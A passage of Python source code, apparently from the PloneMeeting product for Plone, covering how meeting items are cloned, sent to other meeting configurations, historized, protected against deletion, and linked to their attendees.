includeAuto=True)\n for groupInChargeUid in groupsInChargeUids:\n observersPloneGroupId = get_plone_group_id(groupInChargeUid, 'observers')\n self.manage_addLocalRoles(observersPloneGroupId, (READER_USECASES['groupsincharge'],))\n\n def _historizeAdvicesOnItemEdit(self):\n \"\"\"When item is edited, historize advices if necessary; this is the case if an advice\n was really given and is not hidden during redaction.\"\"\"\n tool = api.portal.get_tool('portal_plonemeeting')\n cfg = tool.getMeetingConfig(self)\n if cfg.getHistorizeAdviceIfGivenAndItemModified():\n for advice_id, adviceInfo in self.adviceIndex.items():\n if not self._advice_is_given(advice_id):\n continue\n adviceObj = self.get(adviceInfo['advice_id'])\n adviceObj.historize_if_relevant(comment='Historized because item was edited.')\n\n def _advice_is_given(self, advice_id):\n \"\"\"Return True if advice of given p_advice_id is really given,\n False if it is not given, asked again or still hidden during redaction.\"\"\"\n is_given = True\n advice_info = self.adviceIndex.get(advice_id, {})\n if not advice_info or \\\n advice_info['type'] in (NOT_GIVEN_ADVICE_VALUE, 'asked_again') or \\\n advice_info['hidden_during_redaction']:\n is_given = False\n return is_given\n\n security.declareProtected(ModifyPortalContent, 'initializeArchetype')\n\n def initializeArchetype(self, **kwargs):\n '''Override to call item_added_or_initialized to make plone.restapi happy.'''\n item_added_or_initialized(self)\n return BaseFolder.initializeArchetype(self, **kwargs)\n\n security.declareProtected(ModifyPortalContent, 'processForm')\n\n def processForm(self, data=1, metadata=0, REQUEST=None, values=None):\n ''' '''\n if not self.isTemporary():\n # Remember previous data if historization is enabled.\n self._v_previousData = rememberPreviousData(self)\n # Historize advices that 
were not historized yet, this way we ensure that\n # given advices are historized with the right item data\n if hasattr(self, 'adviceIndex'):\n self._historizeAdvicesOnItemEdit()\n # unmark deferred SearchableText reindexing\n setattr(self, REINDEX_NEEDED_MARKER, False)\n return BaseFolder.processForm(\n self, data=data, metadata=metadata, REQUEST=REQUEST, values=values)\n\n security.declarePublic('showOptionalAdvisers')\n\n def showOptionalAdvisers(self):\n '''Show 'MeetingItem.optionalAdvisers' if the \"advices\" functionality\n is enabled and if there are selectable optional advices.'''\n tool = api.portal.get_tool('portal_plonemeeting')\n cfg = tool.getMeetingConfig(self)\n res = False\n if cfg.getUseAdvices():\n vocab = self.getField('optionalAdvisers').Vocabulary(self)\n res = bool(vocab)\n return res\n\n security.declarePublic('isVotesEnabled')\n\n def isVotesEnabled(self):\n '''Returns True if the votes are enabled.'''\n tool = api.portal.get_tool('portal_plonemeeting')\n cfg = tool.getMeetingConfig(self)\n return cfg.getUseVotes()\n\n security.declarePublic('getSiblingItem')\n\n def getSiblingItem(self, whichItem, itemNumber=True):\n '''If this item is within a meeting, this method returns the itemNumber of\n a sibling item that may be accessed by the current user. p_whichItem\n can be:\n - 'all' (return every possible way here under);\n - 'previous' (the previous item within the meeting);\n - 'next' (the next item within the meeting);\n - 'first' (the first item of the meeting);\n - 'last' (the last item of the meeting).\n If there is no sibling (or if it makes no sense to ask for this\n sibling), the method returns None.\n If p_itemNumber is True (default), we return the getItemNumber.\n '''\n sibling = {'first': None, 'last': None, 'next': None, 'previous': None}\n if self.hasMeeting():\n meeting = self.getMeeting()\n # use catalog query so returned items are really accessible by current user\n brains = meeting.get_items(ordered=True, the_objects=False)\n itemUids = [brain.UID for brain in brains]\n itemUid = self.UID()\n itemUidIndex = itemUids.index(itemUid)\n if whichItem == 'previous' or whichItem == 'all':\n # Is a previous item available?\n if not itemUidIndex == 0:\n sibling['previous'] = brains[itemUidIndex - 1]\n if whichItem == 'next' or whichItem == 'all':\n # Is a next item available?\n if not itemUidIndex == len(itemUids) - 1:\n sibling['next'] = brains[itemUidIndex + 1]\n if whichItem == 'first' or whichItem == 'all':\n sibling['first'] = brains[0]\n if whichItem == 'last' or whichItem == 'all':\n sibling['last'] = brains[-1]\n if sibling and itemNumber:\n # turn value (brain) into item number value (like 800)\n sibling = {key: value and value._unrestrictedGetObject().getItemNumber() or None\n for key, value in sibling.items()}\n return sibling.get(whichItem, sibling)\n\n security.declarePublic('showDuplicateItemAction')\n\n def showDuplicateItemAction(self):\n '''Condition for displaying the 'duplicate' action in the interface.\n Returns True if the user can duplicate the item.'''\n # Conditions for being able to see the \"duplicate an item\" action:\n # - the functionality is enabled in MeetingConfig;\n # - the item is not added in the configuration;\n # - the user is creator in some group;\n # - the user must be able to see the item if it is secret.\n # The user will duplicate the item in his own folder.\n tool = api.portal.get_tool('portal_plonemeeting')\n cfg = tool.getMeetingConfig(self)\n if not cfg.getEnableItemDuplication() or \\\n self.isDefinedInTool() or 
\\\n not tool.userIsAmong(['creators'], cfg=cfg) or \\\n not self.adapted().isPrivacyViewable():\n return False\n return True\n\n def _mayClone(self, cloneEventAction=None):\n \"\"\" \"\"\"\n # first check that we are not trying to clone an item\n # we can not access because of privacy status\n # do this check if we are not creating an item from an itemTemplate\n # because if a proposingGroup is defined, it will not be\n # privacyViewable and using such an item template will always fail...\n if not self.isDefinedInTool() and not self.adapted().isPrivacyViewable():\n raise Unauthorized\n\n # 'duplicate' and 'duplicate and keep link'\n if cloneEventAction in (DUPLICATE_EVENT_ACTION, DUPLICATE_AND_KEEP_LINK_EVENT_ACTION) and \\\n not self.showDuplicateItemAction():\n raise Unauthorized\n\n security.declarePrivate('clone')\n\n def clone(self, copyAnnexes=True, copyDecisionAnnexes=False, newOwnerId=None,\n cloneEventAction=None, cloneEventActionLabel=None, destFolder=None,\n copyFields=DEFAULT_COPIED_FIELDS, newPortalType=None, keepProposingGroup=False,\n setCurrentAsPredecessor=False, manualLinkToPredecessor=False,\n inheritAdvices=False, inheritedAdviceUids=[], keep_ftw_labels=False,\n keptAnnexIds=[], keptDecisionAnnexIds=[], item_attrs={}, reindexNewItem=True):\n '''Clones me in the PloneMeetingFolder of the current user, or of\n p_newOwnerId if given (this user will also become owner of this\n item). If there is a p_cloneEventAction, an event will be included\n in the cloned item's history, indicating that it was created from\n another item (useful for delayed items, but not when simply\n duplicating an item). p_copyFields contains the list of fields\n we want to keep the value of; for fields not in this list, the new\n field value will be the default value for this field.\n If p_keepProposingGroup, the proposingGroup is kept in\n ToolPloneMeeting.pasteItem even if the current user is not a member\n of that group.\n If p_setCurrentAsPredecessor, current item will be set as predecessor\n for the new item; in addition, if p_manualLinkToPredecessor is True and\n optional field MeetingItem.manuallyLinkedItems is enabled, this will create\n a manualLink to the predecessor, otherwise, the linked_predecessor_uid is used\n and the link is unbreakable (at least thru the UI).\n If p_inheritAdvices is True, advices will be inherited from predecessor,\n this also needs p_setCurrentAsPredecessor=True and p_manualLinkToPredecessor=False.\n When p_copyAnnexes=True, we may give a p_keptAnnexIds, if so, only annexes\n with those ids are kept, if not, all annexes are kept.\n Same for p_copyDecisionAnnexes/p_keptDecisionAnnexIds.\n The given p_item_attrs will be arbitrarily set on the new item before it is reindexed.'''\n\n # check if may clone\n self._mayClone(cloneEventAction)\n\n # Get the PloneMeetingFolder of the current user as destFolder\n tool = api.portal.get_tool('portal_plonemeeting')\n userId = get_current_user_id(self.REQUEST)\n # make sure the newOwnerId exists (for example a user created an item, the\n # user was deleted and we are now cloning his item)\n if newOwnerId and not api.user.get(userid=newOwnerId):\n newOwnerId = userId\n # Do not use \"not destFolder\" because destFolder is an ATBTreeFolder\n # and an empty ATBTreeFolder will return False while testing destFolder.\n cfg = tool.getMeetingConfig(self)\n if destFolder is None:\n destFolder = tool.getPloneMeetingFolder(cfg.getId(), newOwnerId)\n # if we are cloning to the same mc, keep some more fields\n same_mc_types = (None,\n cfg.getItemTypeName(),\n 
cfg.getItemTypeName('MeetingItemTemplate'),\n cfg.getItemTypeName('MeetingItemRecurring'))\n cloned_to_same_mc = newPortalType in same_mc_types\n if cloned_to_same_mc:\n copyFields = copyFields + EXTRA_COPIED_FIELDS_SAME_MC\n cloned_from_item_template = self.portal_type == cfg.getItemTypeName('MeetingItemTemplate')\n if cloned_from_item_template:\n copyFields = copyFields + EXTRA_COPIED_FIELDS_FROM_ITEM_TEMPLATE\n # Check if an external plugin want to add some copyFields\n copyFields = copyFields + self.adapted().getExtraFieldsToCopyWhenCloning(\n cloned_to_same_mc, cloned_from_item_template)\n\n # clone\n # Copy/paste item into the folder, change portal_type on source\n # so it is correct in copiedData and may be used in events\n original_portal_type = self.portal_type\n self.portal_type = newPortalType or original_portal_type\n copiedData = self.aq_inner.aq_parent.manage_copyObjects(ids=[self.id])\n newItem = tool.pasteItem(destFolder,\n copiedData,\n copyAnnexes=copyAnnexes,\n copyDecisionAnnexes=copyDecisionAnnexes,\n newOwnerId=newOwnerId, copyFields=copyFields,\n newPortalType=newPortalType,\n keepProposingGroup=keepProposingGroup,\n keep_ftw_labels=keep_ftw_labels,\n keptAnnexIds=keptAnnexIds,\n keptDecisionAnnexIds=keptDecisionAnnexIds)\n self.portal_type = original_portal_type\n\n # special handling for some fields kept when cloned_to_same_mc\n # we check that used values on original item are still useable for cloned item\n # in case configuration changed since original item was created\n dest_cfg = tool.getMeetingConfig(newItem)\n if 'otherMeetingConfigsClonableTo' in copyFields:\n clonableTo = set([mc['meeting_config'] for mc in dest_cfg.getMeetingConfigsToCloneTo()])\n # make sure we only have selectable otherMeetingConfigsClonableTo\n newItem.setOtherMeetingConfigsClonableTo(\n tuple(set(self.getOtherMeetingConfigsClonableTo()).intersection(clonableTo)))\n if 'copyGroups' in copyFields:\n copyGroups = list(self.getCopyGroups())\n selectableCopyGroups = 'copyGroups' in dest_cfg.getUsedItemAttributes() and \\\n dest_cfg.getSelectableCopyGroups() or []\n # make sure we only have selectable copyGroups\n newItem.setCopyGroups(\n tuple(set(copyGroups).intersection(set(selectableCopyGroups))))\n if 'optionalAdvisers' in copyFields:\n optionalAdvisers = list(newItem.getOptionalAdvisers())\n advisers_vocab = get_vocab(\n newItem,\n newItem.getField('optionalAdvisers').vocabulary_factory,\n **{'include_selected': False, 'include_not_selectable_values': False})\n selectableAdvisers = advisers_vocab.by_token\n # make sure we only have selectable advisers\n newItem.setOptionalAdvisers(\n tuple(set(optionalAdvisers).intersection(set(selectableAdvisers))))\n\n # automatically set current item as predecessor for newItem?\n inheritedAdviserUids = []\n if setCurrentAsPredecessor:\n if manualLinkToPredecessor:\n newItem.setManuallyLinkedItems([self.UID()])\n else:\n newItem._update_predecessor(self)\n # manage inherited adviceIds\n if inheritAdvices:\n inheritedAdviserUids = [org_uid for org_uid in self.adviceIndex.keys()\n if (not inheritedAdviceUids or org_uid in inheritedAdviceUids) and\n newItem.couldInheritAdvice(org_uid)]\n\n # set arbitrary attrs before reindexing\n for attr_id, attr_value in item_attrs.items():\n field = newItem.getField(attr_id)\n field.getMutator(newItem)(attr_value)\n\n if cloneEventAction:\n # We are sure that there is only one key in the workflow_history\n # because it was cleaned by ToolPloneMeeting.pasteItem\n # use cloneEventActionLabel or generate a msgid based 
on cloneEventAction\n action_label = cloneEventActionLabel or cloneEventAction + '_comments'\n add_wf_history_action(newItem,\n action_name=cloneEventAction,\n action_label=action_label,\n user_id=userId)\n\n newItem.at_post_create_script(inheritedAdviserUids=inheritedAdviserUids)\n\n # notify that item has been duplicated so subproducts may interact if necessary\n notify(ItemDuplicatedEvent(self, newItem))\n\n # while self.reindexObject() is called without indexes\n # a notifyModified is done, do it also or the modified of cloned item is not updated\n newItem.notifyModified()\n # cloned item is originally reindexed but as we changed things after we reindex here\n # regarding everything that may have changed, including things done in the ItemDuplicatedEvent\n # excepted heavy indexes, so ZCTextIndexes\n if reindexNewItem:\n reindex_object(newItem, no_idxs=['SearchableText', 'Title', 'Description'])\n\n # add logging message to fingerpointing log\n extras = 'object={0} clone_event={1}'.format(\n repr(newItem), cloneEventAction)\n fplog('clone_item', extras=extras)\n return newItem\n\n def get_enable_clone_to_other_mc_fields(self, cfg, ignored_field_names=[]):\n \"\"\"Return the ids of 'otherMeetingConfigsClonableToFieldXXX' that are enabled.\"\"\"\n return [field_name for field_name in self.Schema().keys()\n if field_name in cfg.getUsedItemAttributes() and\n field_name.startswith('otherMeetingConfigsClonableToField') and\n field_name not in ignored_field_names]\n\n security.declarePublic('doCloneToOtherMeetingConfig')\n\n def doCloneToOtherMeetingConfig(self, destMeetingConfigId):\n '''Action used by the 'clone to other config' button.'''\n self.cloneToOtherMeetingConfig(destMeetingConfigId)\n\n def _otherMCMeetingToBePresentedIn(self, destMeetingConfig):\n \"\"\"Returns the logical meeting the item should be presented in\n when it will be sent to given p_destMeetingConfig.\"\"\"\n if destMeetingConfig.getId() in self.getOtherMeetingConfigsClonableToEmergency():\n meetingsAcceptingItems = destMeetingConfig.getMeetingsAcceptingItems(\n inTheFuture=True)\n else:\n wfTool = api.portal.get_tool('portal_workflow')\n meetingWF = wfTool.getWorkflowsFor(destMeetingConfig.getMeetingTypeName())[0]\n meetingsAcceptingItems = destMeetingConfig.getMeetingsAcceptingItems(\n review_states=(wfTool[meetingWF.getId()].initial_state, ),\n inTheFuture=True)\n res = None\n if meetingsAcceptingItems:\n res = meetingsAcceptingItems[0]._unrestrictedGetObject()\n return res\n\n security.declarePrivate('cloneToOtherMeetingConfig')\n\n def cloneToOtherMeetingConfig(self, destMeetingConfigId, automatically=False):\n '''Sends this meetingItem to another meetingConfig whose id is\n p_destMeetingConfigId.\n If p_automatically is True it means that we are sending the item\n using the automatic way, either it means we are sending it manually.\n If defined in the configuration, different transitions will be triggered on\n the cloned item if p_automatically is True.\n In any case, a link to the source item is made.'''\n if not self.adapted().mayCloneToOtherMeetingConfig(destMeetingConfigId, automatically):\n # If the user came here, he even does not deserve a clear message ;-)\n raise Unauthorized\n\n wfTool = api.portal.get_tool('portal_workflow')\n tool = api.portal.get_tool('portal_plonemeeting')\n plone_utils = api.portal.get_tool('plone_utils')\n destMeetingConfig = getattr(tool, destMeetingConfigId, None)\n cfg = tool.getMeetingConfig(self)\n\n # This will get the destFolder or create it if the current user has the 
permission\n # if not, then we return a message\n try:\n destFolder = tool.getPloneMeetingFolder(destMeetingConfigId,\n self.Creator())\n except ValueError:\n # While getting the destFolder, it could not exist, in this case\n # we return a clear message\n plone_utils.addPortalMessage(translate('sendto_inexistent_destfolder_error',\n mapping={'meetingConfigTitle': destMeetingConfig.Title()},\n domain=\"PloneMeeting\", context=self.REQUEST),\n type='error')\n return\n # The owner of the new item will be the same as the owner of the\n # original item.\n newOwnerId = self.Creator()\n cloneEventAction = 'create_to_%s_from_%s' % (destMeetingConfigId,\n cfg.getId())\n fieldsToCopy = list(DEFAULT_COPIED_FIELDS)\n destUsedItemAttributes = destMeetingConfig.getUsedItemAttributes()\n # do not keep optional fields that are not used in the destMeetingConfig\n optionalFields = cfg.listUsedItemAttributes().keys()\n # iterate a copy of fieldsToCopy as we change it in the loop\n for field in list(fieldsToCopy):\n if field in optionalFields and field not in destUsedItemAttributes:\n # special case for 'groupsInCharge' that works alone or\n # together with 'proposingGroupWithGroupInCharge'\n if field == 'groupsInCharge' and \\\n 'proposingGroupWithGroupInCharge' in destUsedItemAttributes:\n continue\n fieldsToCopy.remove(field)\n # special case for 'budgetRelated' that works together with 'budgetInfos'\n if field == 'budgetInfos':\n fieldsToCopy.remove('budgetRelated')\n\n contentsKeptOnSentToOtherMC = cfg.getContentsKeptOnSentToOtherMC()\n keepAdvices = 'advices' in contentsKeptOnSentToOtherMC\n keptAdvices = keepAdvices and cfg.getAdvicesKeptOnSentToOtherMC(as_org_uids=True, item=self) or []\n copyAnnexes = 'annexes' in contentsKeptOnSentToOtherMC\n copyDecisionAnnexes = 'decision_annexes' in contentsKeptOnSentToOtherMC\n newItem = self.clone(copyAnnexes=copyAnnexes,\n copyDecisionAnnexes=copyDecisionAnnexes,\n newOwnerId=newOwnerId,\n cloneEventAction=cloneEventAction,\n destFolder=destFolder, copyFields=fieldsToCopy,\n newPortalType=destMeetingConfig.getItemTypeName(),\n keepProposingGroup=True, setCurrentAsPredecessor=True,\n inheritAdvices=keepAdvices, inheritedAdviceUids=keptAdvices,\n reindexNewItem=False)\n # manage categories mapping, if original and new items use\n # categories, we check if a mapping is defined in the configuration of the original item\n originalCategory = self.getCategory(theObject=True)\n if originalCategory and \"category\" in destUsedItemAttributes:\n # find out if something is defined when sending an item to destMeetingConfig\n for destCat in originalCategory.category_mapping_when_cloning_to_other_mc:\n if destCat.split('.')[0] == destMeetingConfigId:\n # we found a mapping defined for the new category, apply it\n # get the category so it fails if it does not exist (that should not be possible...)\n newCat = getattr(destMeetingConfig.categories, destCat.split('.')[1])\n newItem.setCategory(newCat.getId())\n break\n\n # find meeting to present the item in and set it as preferred\n # this way if newItem needs to be presented in a frozen meeting, it works\n # as it requires the preferredMeeting to be the frozen meeting\n meeting = self._otherMCMeetingToBePresentedIn(destMeetingConfig)\n if meeting:\n newItem.setPreferredMeeting(meeting.UID())\n # handle 'otherMeetingConfigsClonableToPrivacy' of original item\n if destMeetingConfigId in self.getOtherMeetingConfigsClonableToPrivacy() and \\\n 'privacy' in destUsedItemAttributes:\n newItem.setPrivacy('secret')\n\n # handle 
'otherMeetingConfigsClonableToFieldXXX' of original item\n        for other_mc_field_name in self.get_enable_clone_to_other_mc_fields(cfg):\n            # first check if the original field is not empty\n            if self.fieldIsEmpty(other_mc_field_name):\n                continue\n            other_mc_field = self.getField(other_mc_field_name)\n            other_mc_field_value = other_mc_field.get(self)\n            dest_field_name = other_mc_field_name.replace('otherMeetingConfigsClonableToField', '')\n            dest_field_name = dest_field_name[0].lower() + dest_field_name[1:]\n            dest_field = newItem.getField(dest_field_name)\n            dest_field.set(newItem, other_mc_field_value)\n\n        # execute some transitions on the newItem if it was defined in the cfg\n        # find the transitions to trigger\n        triggerUntil = NO_TRIGGER_WF_TRANSITION_UNTIL\n        for mctct in cfg.getMeetingConfigsToCloneTo():\n            if mctct['meeting_config'] == destMeetingConfigId:\n                triggerUntil = mctct['trigger_workflow_transitions_until']\n        # if there are transitions to trigger, trigger them!\n        # this is only done when the item is cloned automatically or the current user isManager\n        if not triggerUntil == NO_TRIGGER_WF_TRANSITION_UNTIL and \\\n           (automatically or tool.isManager(cfg)):\n            # triggerUntil is like meeting-config-xxx.validate, get the real transition\n            triggerUntil = triggerUntil.split('.')[1]\n            wf_comment = translate('transition_auto_triggered_item_sent_to_this_config',\n                                   domain='PloneMeeting',\n                                   context=self.REQUEST)\n            # save the original published object in case we are presenting\n            # several items in a meeting and some are sent to another MC then presented\n            # to a meeting of this other MC\n            originalPublishedObject = self.REQUEST.get('PUBLISHED')\n            # do this as Manager to be sure that transitions may be triggered\n            with api.env.adopt_roles(roles=['Manager']):\n                destCfgTitle = safe_unicode(destMeetingConfig.Title())\n                # we will warn the user if some transitions may not be triggered and\n                # triggerUntil is not reached\n                need_to_warn = True\n                # try to bypass by using the \"validate\" shortcut\n                if triggerUntil in [\"validate\", \"present\"] and \\\n                   \"validate\" in get_transitions(newItem):\n                    wfTool.doActionFor(newItem, \"validate\")\n                for tr in destMeetingConfig.getTransitionsForPresentingAnItem(\n                        org_uid=newItem.getProposingGroup()):\n                    # special handling for the 'present' transition\n                    # that needs a meeting as 'PUBLISHED' object to work\n                    if tr == 'present' and \\\n                       not isinstance(newItem.wfConditions()._check_required_data(\"presented\"), No):\n                        if not meeting:\n                            plone_utils.addPortalMessage(\n                                _('could_not_present_item_no_meeting_accepting_items',\n                                  mapping={'destMeetingConfigTitle': destCfgTitle}),\n                                'warning')\n                            # avoid double warning message\n                            need_to_warn = False\n                            break\n                        newItem.REQUEST['PUBLISHED'] = meeting\n                    # trigger the transition if available\n                    was_triggered = False\n                    if tr in get_transitions(newItem):\n                        wfTool.doActionFor(newItem, tr, comment=wf_comment)\n                        was_triggered = True\n                    # if we reach the triggerUntil transition, stop\n                    if tr == triggerUntil:\n                        if was_triggered:\n                            need_to_warn = False\n                        break\n                # warn if triggerUntil was not reached\n                if need_to_warn:\n                    plone_utils.addPortalMessage(\n                        translate('could_not_trigger_transition_for_cloned_item',\n                                  mapping={'meetingConfigTitle': destCfgTitle},\n                                  domain=\"PloneMeeting\",\n                                  context=self.REQUEST),\n                        type='warning')\n            # set back the originally PUBLISHED object\n            self.REQUEST.set('PUBLISHED', originalPublishedObject)\n\n        # Save that the element has been cloned to another meetingConfig\n
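        # (illustrative note, added here) the annotation stores the new item UID under a key\n        # derived from the destination cfg id; _checkAlreadyClonedToOtherMC and\n        # getItemClonedToOtherMC (below) read this same key back.\n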
        annotation_key = self._getSentToOtherMCAnnotationKey(destMeetingConfigId)\n        ann = IAnnotations(self)\n        ann[annotation_key] = newItem.UID()\n\n        # When an item is duplicated, if it was sent from a MeetingConfig to\n        # another, we will add a line in the original item history specifying that\n        # it was sent to another meetingConfig. The 'new item' already has\n        # a line added to its workflow_history.\n        # add a line to the original item history\n        action_label = translate(\n            'sentto_othermeetingconfig',\n            domain=\"PloneMeeting\",\n            context=self.REQUEST,\n            mapping={'meetingConfigTitle': safe_unicode(destMeetingConfig.Title())})\n        action_name = destMeetingConfig._getCloneToOtherMCActionTitle(destMeetingConfig.Title())\n        # add an event to the workflow history\n        add_wf_history_action(self, action_name=action_name, action_label=action_label)\n\n        # Send an email to the users able to modify the new item, if relevant\n        mapping = {'originMeetingConfigTitle': safe_unicode(cfg.Title()), }\n        sendMailIfRelevant(newItem,\n                           'itemClonedToThisMC',\n                           ModifyPortalContent,\n                           mapping=mapping,\n                           isPermission=True)\n        plone_utils.addPortalMessage(\n            translate('sendto_success',\n                      mapping={'cfgTitle': safe_unicode(destMeetingConfig.Title())},\n                      domain=\"PloneMeeting\",\n                      context=self.REQUEST),\n            type='info')\n\n        # notify that the item has been duplicated to another meetingConfig\n        # so subproducts may interact if necessary\n        notify(ItemDuplicatedToOtherMCEvent(self, newItem))\n\n        # reindex everything but ZCTextIndexes for newItem\n        # and 'sentToInfos' for self\n        # reindex after the call to ItemDuplicatedToOtherMCEvent so we avoid a double reindex\n        reindex_object(newItem, no_idxs=['SearchableText', 'Title', 'Description'])\n        reindex_object(self, idxs=['sentToInfos'], update_metadata=False)\n\n        return newItem\n\n    def _getSentToOtherMCAnnotationKey(self, destMeetingConfigId):\n        '''Returns the annotation key where we store the UID of the item we\n           cloned to another meetingConfigFolder.'''\n        return SENT_TO_OTHER_MC_ANNOTATION_BASE_KEY + destMeetingConfigId\n\n
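    # Example of the key format (hypothetical id, for illustration only):\n    # _getSentToOtherMCAnnotationKey('meeting-config-council') returns\n    # SENT_TO_OTHER_MC_ANNOTATION_BASE_KEY + 'meeting-config-council'.\n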
    security.declarePublic('mayCloneToOtherMeetingConfig')\n\n    def mayCloneToOtherMeetingConfig(self, destMeetingConfigId, automatically=False):\n        '''Checks that we can clone the item to another meetingConfigFolder.\n           These are light checks as this could be called several times. This\n           method can be adapted.'''\n        item = self.getSelf()\n        tool = api.portal.get_tool('portal_plonemeeting')\n        cfg = tool.getMeetingConfig(item)\n\n        # the item must be sendable and not already sent\n        if destMeetingConfigId not in item.getOtherMeetingConfigsClonableTo() or \\\n           item._checkAlreadyClonedToOtherMC(destMeetingConfigId):\n            return False\n\n        # Regarding item state, the item has to be:\n        # - current state in itemAutoSentToOtherMCStates;\n        # - current state in itemManualSentToOtherMCStates/itemAutoSentToOtherMCStates\n        #   and the user has ModifyPortalContent or is a MeetingManager.\n        item_state = item.query_state()\n        if not ((automatically and\n                 item_state in cfg.getItemAutoSentToOtherMCStates()) or\n                (not automatically and\n                 (item_state in cfg.getItemManualSentToOtherMCStates() or\n                  item_state in cfg.getItemAutoSentToOtherMCStates()) and\n                 (_checkPermission(ModifyPortalContent, item) or tool.isManager(cfg)))\n                ):\n            return False\n\n        # Cannot clone an item to the same meetingConfig as the original item,\n        # or if the given destMeetingConfigId is not clonable to.\n        if (cfg.getId() == destMeetingConfigId) or \\\n           destMeetingConfigId not in [mctct['meeting_config'] for mctct in cfg.getMeetingConfigsToCloneTo()]:\n            return False\n\n        return True\n\n    def _checkAlreadyClonedToOtherMC(self, destMeetingConfigId):\n        '''Check if the item has already been sent to the given\n           destMeetingConfigId.'''\n        annotation_key = self._getSentToOtherMCAnnotationKey(destMeetingConfigId)\n        ann = IAnnotations(self)\n        if ann.get(annotation_key, False):\n            return True\n        return False\n\n    security.declarePrivate('getItemClonedToOtherMC')\n\n    def getItemClonedToOtherMC(self, destMeetingConfigId, theObject=True):\n        '''Returns the item cloned to the destMeetingConfigId if any.\n           If p_theObject is True, the real object is returned, if not, we return the brain.'''\n        annotation_key = self._getSentToOtherMCAnnotationKey(destMeetingConfigId)\n        ann = IAnnotations(self)\n        itemUID = ann.get(annotation_key, None)\n        if itemUID:\n            catalog = api.portal.get_tool('portal_catalog')\n            # we search unrestricted because the current user may not have access to the other item\n            brains = catalog.unrestrictedSearchResults(UID=itemUID)\n            if brains:\n                if theObject:\n                    return brains[0]._unrestrictedGetObject()\n                else:\n                    return brains[0]\n        return None\n\n    security.declarePrivate('manage_beforeDelete')\n\n    def manage_beforeDelete(self, item, container):\n        '''This is a workaround to avoid a Plone design problem where it is\n           possible to remove a folder containing objects you cannot\n           remove.'''\n        # If we are here, everything has already been checked before.\n        # Just check that we are removing the item itself, a Plone Site or a MeetingConfig.\n        # We can remove an item directly, not \"through\" its container.\n        if item.meta_type not in ('Plone Site', 'MeetingConfig', 'MeetingItem'):\n            user_id = get_current_user_id(item.REQUEST)\n            logger.warn(BEFOREDELETE_ERROR % (user_id, self.id))\n            raise BeforeDeleteException(\n                translate(\"can_not_delete_meetingitem_container\",\n                          domain=\"plone\",\n                          context=item.REQUEST))\n        # if we are not removing the site and we are not in the creation process of\n        # an item, manage the predecessor\n        if item.meta_type not in ['Plone Site', 'MeetingConfig'] and not item._at_creation_flag:\n            # If the item has a predecessor in another meetingConfig we must remove\n            # the annotation on the predecessor specifying it.\n            predecessor = self.get_predecessor()\n            if predecessor:\n                tool = api.portal.get_tool('portal_plonemeeting')\n                cfgId = 
tool.getMeetingConfig(self).getId()\n if predecessor._checkAlreadyClonedToOtherMC(cfgId):\n ann = IAnnotations(predecessor)\n annotation_key = self._getSentToOtherMCAnnotationKey(\n cfgId)\n del ann[annotation_key]\n # reindex predecessor's sentToInfos index\n reindex_object(predecessor, idxs=['sentToInfos'], update_metadata=0)\n # manage_beforeDelete is called before the IObjectWillBeRemovedEvent\n # in IObjectWillBeRemovedEvent references are already broken, we need to remove\n # the item from a meeting if it is inserted in there...\n # do this only when not removing meeting including items\n if not item.REQUEST.get('items_to_remove') and item.hasMeeting():\n item.getMeeting().remove_item(item)\n # and to clean advice inheritance\n for adviceId in item.adviceIndex.keys():\n self._cleanAdviceInheritance(item, adviceId)\n\n BaseFolder.manage_beforeDelete(self, item, container)\n\n def _cleanAdviceInheritance(self, item, adviceId):\n '''Clean advice inheritance for given p_adviceId on p_item.'''\n successors = self.get_every_successors()\n for successor in successors:\n if successor.adviceIndex.get(adviceId, None) and \\\n successor.adviceIndex[adviceId]['inherited']:\n successor.adviceIndex[adviceId]['inherited'] = False\n successor.update_local_roles()\n\n security.declarePublic('get_attendees')\n\n def get_attendees(self, the_objects=False, ordered=True):\n '''Returns the attendees for this item, so people that are \"present\".'''\n res = []\n if not self.hasMeeting():\n return res\n meeting = self.getMeeting()\n attendees = meeting.get_attendees(the_objects=False)\n item_absents = self.get_item_absents()\n item_excused = self.get_item_excused()\n item_non_attendees = self.get_item_non_attendees()\n attendees = [attendee for attendee in attendees\n if attendee not in item_absents + item_excused + item_non_attendees]\n # get really present attendees now\n if ordered:\n attendees = self._order_contacts(attendees)\n attendees = meeting._get_contacts(uids=attendees, the_objects=the_objects)\n return attendees\n\n def _order_contacts(self, uids):\n \"\"\" \"\"\"\n return [uid for uid in self.get_all_attendees(ordered=True)\n if uid in uids]\n\n def get_all_attendees(self, uids=[], the_objects=False, ordered=True):\n '''Returns every attendees for this item, including absents, excused, ...'''\n if not self.hasMeeting():\n return ()\n meeting = self.getMeeting()\n if ordered and not uids:\n uids = meeting._get_item_attendees_order(self.UID())\n return meeting.get_all_attendees(uids, the_objects=the_objects)\n\n def _appendLinkedItem(self, item, tool, cfg, only_viewable):\n if not only_viewable:\n return True\n hideNotViewableLinkedItemsTo = cfg.getHideNotViewableLinkedItemsTo()\n if hideNotViewableLinkedItemsTo and \\\n tool.isPowerObserverForCfg(cfg, power_observer_types=hideNotViewableLinkedItemsTo) and \\\n not _checkPermission(View, item):\n return False\n return True\n\n def downOrUpWorkflowAgain_cachekey(method, self, brain=False):\n '''cachekey method for self.downOrUpWorkflowAgain.'''\n repr_self = None\n last_action_time = None\n if not self.hasMeeting():\n repr_self = repr(self)\n last_action_time = getLastWFAction(self)[\"time\"]\n return repr_self, last_action_time\n\n security.declarePrivate('downOrUpWorkflowAgain')\n\n # not ramcached perf tests says it does not change anything\n # and this avoid useless entry in cache\n # @ram.cache(downOrUpWorkflowAgain_cachekey)\n def downOrUpWorkflowAgain(self):\n \"\"\"Was current item already in same review_state before?\n And if so, is it 
